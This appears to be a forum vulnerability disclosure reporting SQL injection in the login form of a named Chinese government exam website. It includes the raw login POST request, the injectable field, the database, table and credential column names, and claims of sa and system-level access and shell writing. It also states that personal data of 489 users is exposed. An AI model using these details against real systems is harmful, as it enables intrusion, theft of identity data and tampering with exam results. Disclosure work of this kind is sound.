|
|
漏洞存在的网址:http://lffzxzzf1.lf.gov.cn/
廊坊政府执法考试后台
后台存在post注入
------------------------------
POST /login.aspx HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://lffzxzzf1.lf.gov.cn/login.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: lffzxzzf1.lf.gov.cn
Content-Length: 328
Pragma: no-cache
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTMyNDM5ODU3OQ9kFgICAQ9kFgICDw8PFgIeBFRleHQFG%2BeUqOaIt%2BWQjeaIluWvhueggemUmeivr%2B%2B8gWRkZLcal%2FrJ5560OhyzPTmYIs%2BGCAsR&__EVENTVALIDATION=%2FwEWBQKgxv21AQLs0bLrBgLs0fbZDAKM54rGBgK7q7GGCFPpA9cnzfaYRxV2hAhz2wn5DL86&TextBox1=admin&TextBox2=admin&Button1=%E7%99%BB%E9%99%86
TextBox1存在注入
sa权限
可写shell或者达到直接提权的目的
库名zhifakaoshi表名tb_user字段一个用户名一个密码yhm,yhmm这两个
影响489个用户的信息安全 有身份证和照片姓名 还可修改成绩等
system权限可直接提权
 |
评分
-
查看全部评分
|
发表于 2016-4-7 15:37:52
发表于 2016-4-7 20:52:30
